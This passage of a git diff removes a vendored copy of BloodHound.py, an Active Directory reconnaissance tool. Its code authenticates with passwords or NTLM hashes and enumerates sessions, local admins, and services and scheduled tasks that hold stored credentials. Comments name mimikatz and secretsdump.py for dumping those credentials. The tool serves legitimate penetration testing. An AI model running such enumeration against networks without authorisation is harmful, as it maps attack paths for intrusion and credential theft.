args.hashes is not None): - logging.error('Authentication: password or hashes provided without username') - sys.exit(1) - elif args.hashes is not None and args.username is not None: - logging.debug('Authentication: NTLM hashes') - lm, nt = args.hashes.split(":") - auth = ADAuthentication(lm_hash=lm, nt_hash=nt, username=args.username, domain=args.domain) - else: - parser.print_help() - sys.exit(1) - - ad = AD(auth=auth, domain=args.domain, nameserver=args.nameserver, dns_tcp=args.dns_tcp) - - # Resolve collection methods - collect = resolve_collection_methods(args.collectionmethod) - if not collect: - return - logging.debug('Resolved collection methods: %s', ', '.join(list(collect))) - - logging.debug('Using DNS to retrieve domain information') - ad.dns_resolve(kerberos=args.kerberos, domain=args.domain, options=args) - - # Override the detected DC / GC if specified - if args.domain_controller: - if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', args.domain_controller): - logging.error('The specified domain controller %s looks like an IP address, but requires a hostname (FQDN).\n'\ - 'Use the -ns flag to specify a DNS server IP if the hostname does not resolve on your default nameserver.', - args.domain_controller) - sys.exit(1) - ad.override_dc(args.domain_controller) - if args.global_catalog: - if re.match(r'\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}', args.global_catalog): - logging.error('The specified global catalog server %s looks like an IP address, but requires a hostname (FQDN).\n'\ - 'Use the -ns flag to specify a DNS server IP if the hostname does not resolve on your default nameserver.', - args.global_catalog) - sys.exit(1) - ad.override_gc(args.global_catalog) - - bloodhound = BloodHound(ad) - bloodhound.connect() - bloodhound.run(collect=collect, - num_workers=args.workers, - disable_pooling=args.disable_pooling) - - -if __name__ == '__main__': - main() diff --git a/external/bloodhound/__main__.py b/external/bloodhound/__main__.py deleted file mode 100755 
index a9e7cde..0000000 --- a/external/bloodhound/__main__.py +++ /dev/null @@ -1,5 +0,0 @@ -#! /usr/bin/env python - -import bloodhound - -bloodhound.main() diff --git a/external/bloodhound/ad/__init__.py b/external/bloodhound/ad/__init__.py deleted file mode 100755 index 94d6578..0000000 --- a/external/bloodhound/ad/__init__.py +++ /dev/null @@ -1,23 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. 
-# -#################### diff --git a/external/bloodhound/ad/authentication.py b/external/bloodhound/ad/authentication.py deleted file mode 100755 index c7770bd..0000000 --- a/external/bloodhound/ad/authentication.py +++ /dev/null @@ -1,89 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. 
-# -#################### - -import logging -from ldap3 import Server, Connection, NTLM, ALL -from ldap3.core.results import RESULT_STRONGER_AUTH_REQUIRED - -""" -Active Directory authentication helper -""" -class ADAuthentication(object): - def __init__(self, username='', password='', domain='', - lm_hash='', nt_hash='', aes_key='', kdc=None): - self.username = username - self.domain = domain - if '@' in self.username: - self.username, self.domain = self.username.rsplit('@', 1) - self.password = password - self.lm_hash = lm_hash - self.nt_hash = nt_hash - self.aes_key = aes_key - self.kdc = kdc - - - def getLDAPConnection(self, hostname='', baseDN='', protocol='ldaps', gc=False): - if gc: - # Global Catalog connection - if protocol == 'ldaps': - # Ldap SSL - server = Server("%s://%s:3269" % (protocol, hostname), get_info=ALL) - else: - # Plain LDAP - server = Server("%s://%s:3268" % (protocol, hostname), get_info=ALL) - else: - server = Server("%s://%s" % (protocol, hostname), get_info=ALL) - # ldap3 supports auth with the NT hash. LM hash is actually ignored since only NTLMv2 is used. 
- if self.nt_hash != '': - ldappass = self.lm_hash + ':' + self.nt_hash - else: - ldappass = self.password - #ldaplogin = '%s\\%s' % (self.domain, self.username) - ldaplogin = '%s@%s' % (self.username, self.domain) - #conn = Connection(server, user=ldaplogin, auto_referrals=False, password=ldappass, authentication=NTLM) - conn = Connection(server, user=ldaplogin, auto_referrals=False, password=ldappass) - - # TODO: Kerberos auth for ldap - if self.kdc is not None: - logging.error('Kerberos login is not yet supported!') - # try: - # logging.debug('Authenticating to LDAP server using Kerberos') - # conn.kerberosLogin(self.username, self.password, self.domain, - # self.lm_hash, self.nt_hash, self.aes_key, - # self.kdc) - # except KerberosError as e: - # logging.warning('Kerberos login failed: %s' % e) - # return None - else: - logging.debug('Authenticating to LDAP server') - if not conn.bind(): - result = conn.result - if result['result'] == RESULT_STRONGER_AUTH_REQUIRED and protocol == 'ldap': - logging.warning('LDAP Authentication is refused because LDAP signing is enabled. ' - 'Trying to connect over LDAPS instead...') - return self.getLDAPConnection(hostname, baseDN, 'ldaps') - else: - logging.error('Failure to authenticate with LDAP! 
Error %s' % result['message']) - return None - return conn diff --git a/external/bloodhound/ad/computer.py b/external/bloodhound/ad/computer.py deleted file mode 100755 index 4cd7ff6..0000000 --- a/external/bloodhound/ad/computer.py +++ /dev/null @@ -1,655 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### - -import logging -import traceback -from impacket.dcerpc.v5 import transport, samr, srvs, lsat, lsad, nrpc, wkst, scmr, tsch -from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_LEVEL_PKT_INTEGRITY, RPC_C_AUTHN_LEVEL_PKT_PRIVACY -from impacket.dcerpc.v5.ndr import NULL -from impacket.dcerpc.v5.dtypes import RPC_SID, MAXIMUM_ALLOWED -from impacket import smb3structs -from .utils import ADUtils, AceResolver -from . 
.enumeration.acls import parse_binary_acl -from impacket.smb3 import SMB3 -from impacket.smb import SMB -# Try to import exceptions here, if this does not succeed, then impacket version is too old -try: - HostnameValidationExceptions = (SMB3.HostnameValidationException, SMB.HostnameValidationException) -except AttributeError: - HostnameValidationExceptions = () - -class ADComputer(object): - """ - Computer connected to Active Directory - """ - def __init__(self, hostname=None, samname=None, ad=None, addc=None, objectsid=None): - self.hostname = hostname - self.ad = ad - self.addc = addc - self.samname = samname - self.rpc = None - self.dce = None - self.admins = [] - self.dcom = [] - self.rdp = [] - self.psremote = [] - self.trusts = [] - self.services = [] - self.sessions = [] - self.addr = None - self.smbconnection = None - # The SID of the local domain - self.sid = None - # The SID within the domain - self.objectsid = objectsid - self.primarygroup = None - if addc: - self.aceresolver = AceResolver(ad, ad.objectresolver) - # Did connecting to this host fail before? 
- self.permanentfailure = False - - def get_bloodhound_data(self, entry, collect, skip_acl=False): - data = { - 'ObjectIdentifier': self.objectsid, - 'AllowedToAct': [], - 'PrimaryGroupSid': self.primarygroup, - 'LocalAdmins': self.admins, - 'PSRemoteUsers': self.psremote, - 'Properties': { - 'name': self.hostname.upper(), - 'objectid': self.objectsid, - 'domain': self.ad.domain.upper(), - 'highvalue': False, - 'distinguishedname': ADUtils.get_entry_property(entry, 'distinguishedName') - }, - 'RemoteDesktopUsers': self.rdp, - 'DcomUsers': self.dcom, - 'AllowedToDelegate': [], - 'Sessions': self.sessions, - 'Aces': [] - } - props = data['Properties'] - # via the TRUSTED_FOR_DELEGATION (0x00080000) flag in UAC - props['unconstraineddelegation'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 0x00080000 == 0x00080000 - props['enabled'] = ADUtils.get_entry_property(entry, 'userAccountControl', default=0) & 2 == 0 - - if 'objectprops' in collect or 'acl' in collect: - props['haslaps'] = ADUtils.get_entry_property(entry, 'ms-mcs-admpwdexpirationtime', 0) != 0 - - if 'objectprops' in collect: - props['lastlogontimestamp'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'lastlogontimestamp', default=0, raw=True) - ) - props['pwdlastset'] = ADUtils.win_timestamp_to_unix( - ADUtils.get_entry_property(entry, 'pwdLastSet', default=0, raw=True) - ) - props['serviceprincipalnames'] = ADUtils.get_entry_property(entry, 'servicePrincipalName', []) - props['description'] = ADUtils.get_entry_property(entry, 'description') - props['operatingsystem'] = ADUtils.get_entry_property(entry, 'operatingSystem') - # Add SP to OS if specified - servicepack = ADUtils.get_entry_property(entry, 'operatingSystemServicePack') - if servicepack: - props['operatingsystem'] = '%s %s' % (props['operatingsystem'], servicepack) - - delegatehosts = ADUtils.get_entry_property(entry, 'msDS-AllowedToDelegateTo', []) - for host in delegatehosts: - try: - target = 
host.split('/')[1] - except IndexError: - logging.warning('Invalid delegation target: %s', host) - continue - try: - sid = self.ad.computersidcache.get(target.lower()) - data['AllowedToDelegate'].append(sid) - except KeyError: - if '.' in target: - data['AllowedToDelegate'].append(target.upper()) - if len(delegatehosts) > 0: - props['allowedtodelegate'] = delegatehosts - - # Process resource-based constrained delegation - _, aces = parse_binary_acl(data, - 'computer', - ADUtils.get_entry_property(entry, - 'msDS-AllowedToActOnBehalfOfOtherIdentity', - raw=True), - self.addc.objecttype_guid_map) - outdata = self.aceresolver.resolve_aces(aces) - for delegated in outdata: - if delegated['RightName'] == 'Owner': - continue - if delegated['RightName'] == 'GenericAll': - data['AllowedToAct'].append({'MemberId': delegated['PrincipalSID'], 'MemberType': delegated['PrincipalType']}) - - # Run ACL collection if this was not already done centrally - if 'acl' in collect and not skip_acl: - _, aces = parse_binary_acl(data, - 'computer', - ADUtils.get_entry_property(entry, - 'nTSecurityDescriptor', - raw=True), - self.addc.objecttype_guid_map) - # Parse aces - data['Aces'] = self.aceresolver.resolve_aces(aces) - - return data - - def try_connect(self): - addr = None - try: - addr = self.ad.dnscache.get(self.hostname) - except KeyError: - try: - q = self.ad.dnsresolver.query(self.hostname, 'A', tcp=self.ad.dns_tcp) - for r in q: - addr = r.address - - if addr == None: - return False - # Do exit properly on keyboardinterrupts - except KeyboardInterrupt: - raise - except Exception as e: - # Doesn't exist - if "None of DNS query names exist" in str(e): - logging.info('Skipping enumeration for %s since it could not be resolved.', self.hostname) - else: - logging.warning('Could not resolve: %s: %s', self.hostname, e) - return False - - logging.debug('Resolved: %s' % addr) - - self.ad.dnscache.put(self.hostname, addr) - - self.addr = addr - - logging.debug('Trying connecting to 
computer: %s', self.hostname) - # We ping the host here, this adds a small overhead for setting up an extra socket - # but saves us from constructing RPC Objects for non-existing hosts. Also RPC over - # SMB does not support setting a connection timeout, so we catch this here. - if ADUtils.tcp_ping(addr, 445) is False: - return False - return True - - - def dce_rpc_connect(self, binding, uuid, integrity=False): - if self.permanentfailure: - logging.debug('Skipping connection because of previous failure') - return None - logging.debug('DCE/RPC binding: %s', binding) - - try: - self.rpc = transport.DCERPCTransportFactory(binding) - self.rpc.set_connect_timeout(1.0) - if hasattr(self.rpc, 'set_credentials'): - self.rpc.set_credentials(self.ad.auth.username, self.ad.auth.password, - domain=self.ad.auth.domain, - lmhash=self.ad.auth.lm_hash, - nthash=self.ad.auth.nt_hash, - aesKey=self.ad.auth.aes_key) - - # Use strict validation if possible - if hasattr(self.rpc, 'set_hostname_validation'): - self.rpc.set_hostname_validation(True, False, self.hostname) - - # TODO: check Kerberos support - # if hasattr(self.rpc, 'set_kerberos'): - # self.rpc.set_kerberos(True, self.ad.auth.kdc) - # Uncomment to force SMB2 (especially for development to prevent encryption) - # will break clients only supporting SMB1 ofc - # self.rpc.preferred_dialect(smb3structs.SMB2_DIALECT_21) - - # Re-use the SMB connection if possible - if self.smbconnection: - self.rpc.set_smb_connection(self.smbconnection) - dce = self.rpc.get_dce_rpc() - - # Some interfaces require integrity (such as scheduled tasks) - # others don't support it at all and error out. 
- if integrity: - dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_INTEGRITY) - - # Try connecting, catch hostname validation - try: - dce.connect() - except HostnameValidationExceptions as exc: - logging.info('Ignoring host %s since its hostname does not match: %s', self.hostname, str(exc)) - self.permanentfailure = True - return None - - if self.smbconnection is None: - self.smbconnection = self.rpc.get_smb_connection() - # We explicity set the smbconnection back to the rpc object - # this way it won't be closed when we call disconnect() - self.rpc.set_smb_connection(self.smbconnection) - - # Hostname validation - authname = self.smbconnection.getServerName() - if authname.lower() != self.hostname.split('.')[0].lower(): - logging.info('Ignoring host %s since its reported name %s does not match', self.hostname, authname) - self.permanentfailure = True - return None - -# Implement encryption? -# dce.set_auth_level(NTLM_AUTH_PKT_PRIVACY) - dce.bind(uuid) - except DCERPCException as e: - logging.debug(traceback.format_exc()) - logging.warning('DCE/RPC connection failed: %s', str(e)) - return None - except KeyboardInterrupt: - raise - except Exception as e: - logging.debug(traceback.format_exc()) - logging.warning('DCE/RPC connection failed: %s', e) - return None - except: - logging.warning('DCE/RPC connection failed (unknown error)') - return None - - return dce - - def rpc_get_loggedon(self): - """ - Query logged on users via RPC. 
- Requires admin privs - """ - binding = r'ncacn_np:%s[\PIPE\wkssvc]' % self.addr - loggedonusers = set() - dce = self.dce_rpc_connect(binding, wkst.MSRPC_UUID_WKST) - if dce is None: - logging.warning('Connection failed: %s', binding) - return - try: - # 1 means more detail, including the domain - resp = wkst.hNetrWkstaUserEnum(dce, 1) - for record in resp['UserInfo']['WkstaUserInfo']['Level1']['Buffer']: - # Skip computer accounts - if record['wkui1_username'][-2] == '$': - continue - # Skip sessions for local accounts - if record['wkui1_logon_domain'][:-1].upper() == self.samname.upper(): - continue - domain = record['wkui1_logon_domain'][:-1].upper() - domain_entry = self.ad.get_domain_by_name(domain) - if domain_entry is not None: - domain = ADUtils.ldap2domain(domain_entry['attributes']['distinguishedName']) - logging.debug('Found logged on user at %s: %s@%s' % (self.hostname, record['wkui1_username'][:-1], domain)) - loggedonusers.add((record['wkui1_username'][:-1], domain)) - except DCERPCException as e: - if 'rpc_s_access_denied' in str(e): - logging.debug('Access denied while enumerating LoggedOn on %s, probably no admin privs', self.hostname) - else: - logging.debug('Exception connecting to RPC: %s', e) - except Exception as e: - if 'connection reset' in str(e): - logging.debug('Connection was reset: %s', e) - else: - raise e - - dce.disconnect() - return list(loggedonusers) - - def rpc_close(self): - if self.smbconnection: - self.smbconnection.logoff() - - def rpc_get_sessions(self): - binding = r'ncacn_np:%s[\PIPE\srvsvc]' % self.addr - - dce = self.dce_rpc_connect(binding, srvs.MSRPC_UUID_SRVS) - - if dce is None: - return - - try: - resp = srvs.hNetrSessionEnum(dce, '\x00', NULL, 10) - except DCERPCException as e: - if 'rpc_s_access_denied' in str(e): - logging.debug('Access denied while enumerating Sessions on %s, likely a patched OS', self.hostname) - return [] - else: - raise - except Exception as e: - if str(e).find('Broken pipe') >= 0: - return 
- else: - raise - - sessions = [] - - for session in resp['InfoStruct']['SessionInfo']['Level10']['Buffer']: - userName = session['sesi10_username'][:-1] - ip = session['sesi10_cname'][:-1] - # Strip \\ from IPs - if ip[:2] == '\\\\': - ip = ip[2:] - # Skip empty IPs - if ip == '': - continue - # Skip our connection - if userName == self.ad.auth.username: - continue - # Skip empty usernames - if len(userName) == 0: - continue - # Skip machine accounts - if userName[-1] == '$': - continue - # Skip local connections - if ip in ['127.0.0.1', '[::1]']: - continue - # IPv6 address - if ip[0] == '[' and ip[-1] == ']': - ip = ip[1:-1] - - logging.info('User %s is logged in on %s from %s' % (userName, self.hostname, ip)) - - sessions.append({'user': userName, 'source': ip, 'target': self.hostname}) - - dce.disconnect() - - return sessions - - """ - """ - def rpc_get_domain_trusts(self): - binding = r'ncacn_np:%s[\PIPE\netlogon]' % self.addr - - dce = self.dce_rpc_connect(binding, nrpc.MSRPC_UUID_NRPC) - - if dce is None: - return - - try: - req = nrpc.DsrEnumerateDomainTrusts() - req['ServerName'] = NULL - req['Flags'] = 1 - resp = dce.request(req) - except Exception as e: - raise e - - for domain in resp['Domains']['Domains']: - logging.info('Found domain trust from %s to %s', self.hostname, domain['NetbiosDomainName']) - self.trusts.append({'domain': domain['DnsDomainName'], - 'type': domain['TrustType'], - 'flags': domain['Flags']}) - - dce.disconnect() - - - def rpc_get_services(self): - """ - Query services with stored credentials via RPC. 
- These credentials can be dumped with mimikatz via lsadump::secrets or via secretsdump.py - """ - binding = r'ncacn_np:%s[\PIPE\svcctl]' % self.addr - serviceusers = [] - dce = self.dce_rpc_connect(binding, scmr.MSRPC_UUID_SCMR) - if dce is None: - return - try: - resp = scmr.hROpenSCManagerW(dce) - scManagerHandle = resp['lpScHandle'] - # TODO: Figure out if filtering out service types makes sense - resp = scmr.hREnumServicesStatusW(dce, - scManagerHandle, - dwServiceType=scmr.SERVICE_WIN32_OWN_PROCESS, - dwServiceState=scmr.SERVICE_STATE_ALL) - # TODO: Skip well-known services to save on traffic - for i in range(len(resp)): - try: - ans = scmr.hROpenServiceW(dce, scManagerHandle, resp[i]['lpServiceName'][:-1]) - serviceHandle = ans['lpServiceHandle'] - svcresp = scmr.hRQueryServiceConfigW(dce, serviceHandle) - svc_user = svcresp['lpServiceConfig']['lpServiceStartName'][:-1] - if '@' in svc_user: - logging.info("Found user service: %s running as %s on %s", - resp[i]['lpServiceName'][:-1], - svc_user, - self.hostname) - serviceusers.append(svc_user) - except DCERPCException as e: - if 'rpc_s_access_denied' not in str(e): - logging.debug('Exception querying service %s via RPC: %s', resp[i]['lpServiceName'][:-1], e) - except DCERPCException as e: - logging.debug('Exception connecting to RPC: %s', e) - except Exception as e: - if 'connection reset' in str(e): - logging.debug('Connection was reset: %s', e) - else: - raise e - - dce.disconnect() - return serviceusers - - - def rpc_get_schtasks(self): - """ - Query the scheduled tasks via RPC. Requires admin privileges. 
- These credentials can be dumped with mimikatz via vault::cred - """ - # Blacklisted folders (Default ones) - blacklist = [u'Microsoft\x00'] - # Start with the root folder - folders = ['\\'] - tasks = [] - schtaskusers = [] - binding = r'ncacn_np:%s[\PIPE\atsvc]' % self.addr - try: - dce = self.dce_rpc_connect(binding, tsch.MSRPC_UUID_TSCHS, True) - if dce is None: - return - # Get root folder - resp = tsch.hSchRpcEnumFolders(dce, '\\') - for item in resp['pNames']: - data = item['Data'] - if data not in blacklist: - folders.append('\\'+data) - - # Enumerate the folders we found - # subfolders not supported yet - for folder in folders: - try: - resp = tsch.hSchRpcEnumTasks(dce, folder) - for item in resp['pNames']: - data = item['Data'] - if folder != '\\': - # Make sure to strip the null byte - tasks.append(folder[:-1]+'\\'+data) - else: - tasks.append(folder+data) - except DCERPCException as e: - logging.debug('Error enumerating task folder %s: %s', folder, e) - for task in tasks: - try: - resp = tsch.hSchRpcRetrieveTask(dce, task) - # This returns a tuple (sid, logontype) or None - userinfo = ADUtils.parse_task_xml(resp['pXml']) - if userinfo: - if userinfo[1] == u'Password': - # Convert to byte string because our cache format is in bytes - schtaskusers.append(str(userinfo[0])) - logging.info('Found scheduled task %s on %s with stored credentials for SID %s', - task, - self.hostname, - userinfo[0]) - except DCERPCException as e: - logging.debug('Error querying task %s: %s', task, e) - except DCERPCException as e: - logging.debug('Exception enumerating scheduled tasks: %s', e) - - dce.disconnect() - return schtaskusers - - - """ - This magic is mostly borrowed from impacket/examples/netview.py - """ - def rpc_get_group_members(self, group_rid, resultlist): - binding = r'ncacn_np:%s[\PIPE\samr]' % self.addr - unresolved = [] - dce = self.dce_rpc_connect(binding, samr.MSRPC_UUID_SAMR) - - if dce is None: - return - - try: - resp = samr.hSamrConnect(dce) - 
serverHandle = resp['ServerHandle'] - # Attempt to get the SID from this computer to filter local accounts later - try: - resp = samr.hSamrLookupDomainInSamServer(dce, serverHandle, self.samname[:-1]) - self.sid = resp['DomainId'].formatCanonical() - # This doesn't always work (for example on DCs) - except DCERPCException as e: - # Make it a string which is guaranteed not to match a SID - self.sid = 'UNKNOWN' - - - # Enumerate the domains known to this computer - resp = samr.hSamrEnumerateDomainsInSamServer(dce, serverHandle) - domains = resp['Buffer']['Buffer'] - - # Query the builtin domain (derived from this SID) - sid = RPC_SID() - sid.fromCanonical('S-1-5-32') - - logging.debug('Opening domain handle') - # Open a handle to this domain - resp = samr.hSamrOpenDomain(dce, - serverHandle=serverHandle, - desiredAccess=samr.DOMAIN_LOOKUP | MAXIMUM_ALLOWED, - domainId=sid) - domainHandle = resp['DomainHandle'] - try: - resp = samr.hSamrOpenAlias(dce, - domainHandle, - desiredAccess=samr.ALIAS_LIST_MEMBERS | MAXIMUM_ALLOWED, - aliasId=group_rid) - except samr.DCERPCSessionError as error: - # Group does not exist - if 'STATUS_NO_SUCH_ALIAS' in str(error): - logging.debug('No group with RID %d exists', group_rid) - return - resp = samr.hSamrGetMembersInAlias(dce, - aliasHandle=resp['AliasHandle']) - for member in resp['Members']['Sids']: - sid_string = member['SidPointer'].formatCanonical() - - logging.debug('Found %d SID: %s', group_rid, sid_string) - if not sid_string.startswith(self.sid): - # If the sid is known, we can add the admin value directly - try: - siddata = self.ad.sidcache.get(sid_string) - if siddata is None: - unresolved.append(sid_string) - else: - logging.debug('Sid is cached: %s', siddata['principal']) - resultlist.append({'MemberId': sid_string, - 'MemberType': siddata['type'].capitalize()}) - except KeyError: - # Append it to the list of unresolved SIDs - unresolved.append(sid_string) - else: - logging.debug('Ignoring local group %s', sid_string) - 
except DCERPCException as e: - if 'rpc_s_access_denied' in str(e): - logging.debug('Access denied while enumerating groups on %s, likely a patched OS', self.hostname) - else: - raise - except Exception as e: - if 'connection reset' in str(e): - logging.debug('Connection was reset: %s', e) - else: - raise e - - dce.disconnect() - return unresolved - - - def rpc_resolve_sids(self, sids, resultlist): - """ - Resolve any remaining unknown SIDs for local accounts. - """ - # If all sids were already cached, we can just return - if sids is None or len(sids) == 0: - return - binding = r'ncacn_np:%s[\PIPE\lsarpc]' % self.addr - - dce = self.dce_rpc_connect(binding, lsat.MSRPC_UUID_LSAT) - - if dce is None: - return - - try: - resp = lsad.hLsarOpenPolicy2(dce, lsat.POLICY_LOOKUP_NAMES | MAXIMUM_ALLOWED) - except Exception as e: - if str(e).find('Broken pipe') >= 0: - return - else: - raise - - policyHandle = resp['PolicyHandle'] - - # We could look up the SIDs all at once, but if not all SIDs are mapped, we don't know which - # ones were resolved and which not, making it impossible to map them in the cache. - # Therefor we use more SAMR calls at the start, but after a while most SIDs will be reliable - # in our cache and this function doesn't even need to get called anymore. 
- for sid_string in sids: - try: - resp = lsat.hLsarLookupSids(dce, policyHandle, [sid_string], lsat.LSAP_LOOKUP_LEVEL.enumItems.LsapLookupWksta) - except DCERPCException as e: - if str(e).find('STATUS_NONE_MAPPED') >= 0: - logging.warning('SID %s lookup failed, return status: STATUS_NONE_MAPPED', sid_string) - # Try next SID - continue - elif str(e).find('STATUS_SOME_NOT_MAPPED') >= 0: - # Not all could be resolved, work with the ones that could - resp = e.get_packet() - else: - raise - - domains = [] - for entry in resp['ReferencedDomains']['Domains']: - domains.append(entry['Name']) - - for entry in resp['TranslatedNames']['Names']: - domain = domains[entry['DomainIndex']] - domain_entry = self.ad.get_domain_by_name(domain) - if domain_entry is not None: - domain = ADUtils.ldap2domain(domain_entry['attributes']['distinguishedName']) - # TODO: what if it isn't? Should we fall back to LDAP? - - if entry['Name'] != '': - resolved_entry = ADUtils.resolve_sid_entry(entry, domain) - logging.debug('Resolved SID to name: %s', resolved_entry['principal']) - resultlist.append({'MemberId': sid_string, - 'MemberType': resolved_entry['type'].capitalize()}) - # Add it to our cache - self.ad.sidcache.put(sid_string, resolved_entry) - else: - logging.warning('Resolved name is empty [%s]', entry) - - dce.disconnect() diff --git a/external/bloodhound/ad/domain.py b/external/bloodhound/ad/domain.py deleted file mode 100755 index 5e052cb..0000000 --- a/external/bloodhound/ad/domain.py +++ /dev/null @@ -1,578 +0,0 @@ -#################### -# -# Copyright (c) 2018 Fox-IT -# -# Permission is hereby granted, free of charge, to any person obtaining a copy -# of this software and associated documentation files (the "Software"), to deal -# in the Software without restriction, including without limitation the rights -# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell -# copies of the Software, and to permit persons to whom the Software is -# furnished to do so, 
subject to the following conditions: -# -# The above copyright notice and this permission notice shall be included in all -# copies or substantial portions of the Software. -# -# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR -# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, -# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE -# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER -# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, -# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE -# SOFTWARE. -# -#################### -from __future__ import unicode_literals -import logging -import traceback - -from uuid import UUID -from dns import resolver -from ldap3 import ALL_ATTRIBUTES, BASE -from ldap3.utils.config import _ATTRIBUTES_EXCLUDED_FROM_CHECK -from ldap3.core.exceptions import LDAPKeyError, LDAPAttributeError, LDAPCursorError, LDAPNoSuchObjectResult, LDAPSocketOpenError -from ldap3.protocol.microsoft import security_descriptor_control -# from impacket.krb5.kerberosv5 import KerberosError -from .utils import ADUtils, DNSCache, SidCache, SamCache -from .computer import ADComputer -from . 
.enumeration.objectresolver import ObjectResolver -from future.utils import itervalues, iteritems, native_str - -""" -Active Directory Domain Controller -""" -class ADDC(ADComputer): - def __init__(self, hostname=None, ad=None): - ADComputer.__init__(self, hostname) - self.ad = ad - # Primary LDAP connection - self.ldap = None - # Secondary LDAP connection - self.resolverldap = None - # GC LDAP connection - self.gcldap = None - # Initialize GUID map - self.objecttype_guid_map = None - - # 2020-03-10: Changed `protocol='ldaps'` from `protocol='ldap'` - def ldap_connect(self, protocol='ldaps', resolver=False): - """ - Connect to the LDAP service - """ - logging.info('Connecting to LDAP server: %s' % self.hostname) - - # Convert the hostname to an IP, this prevents ldap3 from doing it - # which doesn't use our custom nameservers - q = self.ad.dnsresolver.query(self.hostname, tcp=self.ad.dns_tcp) - for r in q: - ip = r.address - try: - ldap = self.ad.auth.getLDAPConnection(hostname=ip, - baseDN=self.ad.baseDN, protocol=protocol) - - except LDAPSocketOpenError: - # It didnt like ldaps, try ldap - ldap = self.ad.auth.getLDAPConnection(hostname=ip, - baseDN=self.ad.baseDN, protocol='ldap') - - if resolver: - self.resolverldap = ldap - else: - self.ldap = ldap - return ldap is not None - - # 2020-03-10: Changed `protocol='ldaps'` from `protocol='ldap'` - def gc_connect(self, protocol='ldaps'): - """ - Connect to the global catalog - """ - if self.hostname in self.ad.gcs(): - # This server is a Global Catalog - initial_server = self.hostname - else: - # Pick the first GC server - try: - initial_server = self.ad.gcs()[0] - except IndexError: - # TODO: implement fallback options for GC detection? 
